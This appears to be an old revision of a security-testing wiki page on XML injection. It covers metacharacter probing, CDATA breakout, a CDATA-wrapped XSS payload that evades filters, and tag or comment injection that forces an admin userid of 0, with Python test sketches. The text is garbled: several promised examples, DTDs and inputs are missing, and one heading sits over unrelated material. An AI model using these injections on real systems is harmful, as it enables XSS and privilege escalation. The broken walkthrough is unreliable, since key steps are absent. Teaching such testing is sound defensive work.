Revision as of 14:01, 15 November 2006

Brief Summary

XML Injection testing means trying to inject a crafted XML document into the application: if the XML parser fails to validate the data appropriately, the test result is positive.

Short Description of the Issue

In this section we describe a practical example of XML Injection: first we define an XML-style communication and show how it works. Then we describe the discovery method, in which we try to insert XML metacharacters.
Once this first step is accomplished, the tester will have some information about the XML structure, so it will be possible to try to inject XML data and tags (Tag Injection).

Black Box testing and example

Let's suppose there is a web application that uses an XML-style communication
in order to perform user registration.
This is done by creating and adding a new <user> node to an xmlDB file.
Let's suppose the xmlDB file looks like the following:

but since &foo has no terminating ';', and moreover the &foo; entity is not defined anywhere, the XML is not valid either.
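Both failure modes can be reproduced with any conforming parser. The following is a minimal sketch using Python's standard xml.etree.ElementTree module; the <username> wrapper and the helper name is_well_formed are assumptions made for illustration and are not taken from the application under test.

```python
import xml.etree.ElementTree as ET


def is_well_formed(fragment: str) -> bool:
    """Return True if the parser accepts the fragment, False otherwise."""
    try:
        ET.fromstring(fragment)
        return True
    except ET.ParseError:
        return False


# Hypothetical node built from user-supplied input.
candidates = [
    "<username>foo</username>",       # plain text
    "<username>&foo</username>",      # entity reference without the final ';'
    "<username>&foo;</username>",     # reference to an entity defined nowhere
    "<username>&amp;foo</username>",  # ampersand correctly escaped
]

for fragment in candidates:
    print(fragment, "->", is_well_formed(fragment))
```

A parser error on the unescaped ampersand tells the tester that the input reaches the XML document without being encoded.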

CDATA begin/end tags: <![CDATA[ / ]]> - When a CDATA section is used, the characters enclosed by it are not parsed as markup by the XML parser.

This is often used when a text node contains metacharacters
that must be treated as text values.

For example, if the string '<foo>' has to be represented inside a text node,
CDATA could be used in the following way:

<node>
<![CDATA[<foo>]]>
</node>

so that '<foo>' won't be parsed and will be considered as a text value.
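As a quick check of this behaviour, the sketch below parses a single-line version of the node with Python's standard xml.etree.ElementTree module (the choice of parser is an assumption; any conforming parser should behave the same way).

```python
import xml.etree.ElementTree as ET

# The CDATA section protects '<foo>' from being parsed as a tag.
node = ET.fromstring("<node><![CDATA[<foo>]]></node>")

print(node.text)  # the literal string '<foo>' as a text value
print(len(node))  # number of child elements created from it
```

The parser reports the text '<foo>' and no child element, which confirms that the content was treated as character data.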

If a node is built in the following way:

<username><![CDATA[$userName]]></username>

the tester could try to inject the end CDATA sequence ']]>' in order to invalidate the XML.

userName = ]]>

this will become:

<username><![CDATA[]]>]]></username>

which is not well-formed XML, because the sequence ']]>' may not appear in character data outside a CDATA section.
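The test can be sketched as follows, assuming the application builds the node by plain string concatenation. The template and the helper names build_username_node and parses are hypothetical; the parser is Python's standard xml.etree.ElementTree.

```python
import xml.etree.ElementTree as ET

# Assumed server-side template: the user name is pasted into a CDATA section.
TEMPLATE = "<username><![CDATA[{}]]></username>"


def build_username_node(user_name: str) -> str:
    """Naive concatenation, as a vulnerable application might do it."""
    return TEMPLATE.format(user_name)


def parses(xml_text: str) -> bool:
    """Return True if the parser accepts the text, False otherwise."""
    try:
        ET.fromstring(xml_text)
        return True
    except ET.ParseError:
        return False


benign = build_username_node("tony")
injected = build_username_node("]]>")

print(benign, "->", parses(benign))
print(injected, "->", parses(injected))
```

An error returned only for the second input suggests that the value is placed inside a CDATA section without any encoding.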

External Entity:

Another test is related to the CDATA tag. When the XML document is parsed, the CDATA delimiters are removed, so it is possible to add a script if the tag contents are shown in the HTML page.
Suppose there is a node containing text that will be displayed to the user. If this text can be modified, as in the following:

<html>
$HTMLCode
</html>

it is possible to evade an input filter by inserting HTML text that uses the CDATA tag. For example, inserting the following value:

which, in the parsing phase, has its CDATA delimiters removed, so that the following value is inserted into the HTML:

<script>alert('XSS')</script>

In this case the application is exposed to an XSS vulnerability: code inserted inside CDATA tags can evade the input validation filter.
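The effect can be illustrated with a minimal sketch. The payload, the filter naive_filter_allows, and the use of Python's xml.etree.ElementTree are all assumptions chosen for illustration: the payload is one possible way of splitting the markup characters across CDATA sections, and the filter stands in for a simple blacklist that looks for '<script' in the raw input.

```python
import xml.etree.ElementTree as ET


def naive_filter_allows(value: str) -> bool:
    """Hypothetical blacklist filter: reject input containing '<script'."""
    return "<script" not in value.lower()


# Hypothetical payload: every '<' and '>' is wrapped in its own CDATA section,
# so the raw input never contains the literal string '<script'.
payload = (
    "<![CDATA[<]]>script<![CDATA[>]]>alert('XSS')"
    "<![CDATA[<]]>/script<![CDATA[>]]>"
)

document = "<html>" + payload + "</html>"

# After parsing, the CDATA delimiters are gone and the text is joined together.
rendered = ET.fromstring(document).text

print(naive_filter_allows(payload))
print(rendered)
```

The filter accepts the raw value, yet the text handed to the page after parsing is the complete script element, which is why the output must be encoded after parsing rather than filtered before it.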

Entity:
It is possible to define an entity using a DTD. An entity is referenced in the form &name;, for example &lt;. It is also possible to specify a URL as an entity: this creates a possible XML External Entity (XEE) vulnerability. So, the last test to try is formed by the following strings:

The resulting XML file will be well formed, and it is likely that the userid tag
will be considered with the latter value (0 = admin id).
The only shortcoming is that the userid tag appears twice in the last user node, and
an XML file is often associated with a schema or a DTD.
Let's suppose now that the XML structure has the following DTD:

This way the original userid tag will be commented out and the injected one will be
parsed in compliance with the DTD rules.
The result is that user 'tony' will be logged in with userid=0 (which could be an administrator uid).
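Both variants of the tag injection can be sketched as follows. The node layout (username, password, userid, mail), the default userid of 500, the field values, and the helper names build_user and userids are assumptions made for illustration; the sketch only shows how string concatenation lets injected tags and comment delimiters reshape the node.

```python
import xml.etree.ElementTree as ET


def build_user(username: str, password: str, mail: str, userid: str = "500") -> str:
    """Assumed vulnerable registration code: fields are concatenated unescaped."""
    return (
        "<user>"
        f"<username>{username}</username>"
        f"<password>{password}</password>"
        f"<userid>{userid}</userid>"
        f"<mail>{mail}</mail>"
        "</user>"
    )


def userids(xml_text: str) -> list:
    """Return the text of every userid element in the parsed user node."""
    return [node.text for node in ET.fromstring(xml_text).findall("userid")]


# Variant 1: inject a second userid tag through the mail field.
duplicated = build_user(
    "tony",
    "secret",
    "tony@example.com</mail><userid>0</userid><mail>tony@example.com",
)

# Variant 2: open a comment in the password field and close it in the mail
# field, so the original userid tag is swallowed by the comment.
commented = build_user(
    "tony",
    "secret</password><!--",
    "--><userid>0</userid><mail>tony@example.com",
)

print(userids(duplicated))
print(userids(commented))
```

In the first variant the node carries two userid elements, which a schema or DTD check could reject; in the second only the injected value survives, so the node keeps the expected structure.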